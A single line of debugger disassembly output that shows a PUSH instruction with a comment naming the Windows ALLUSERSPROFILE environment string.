004054BF   PUSH 10000                                UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"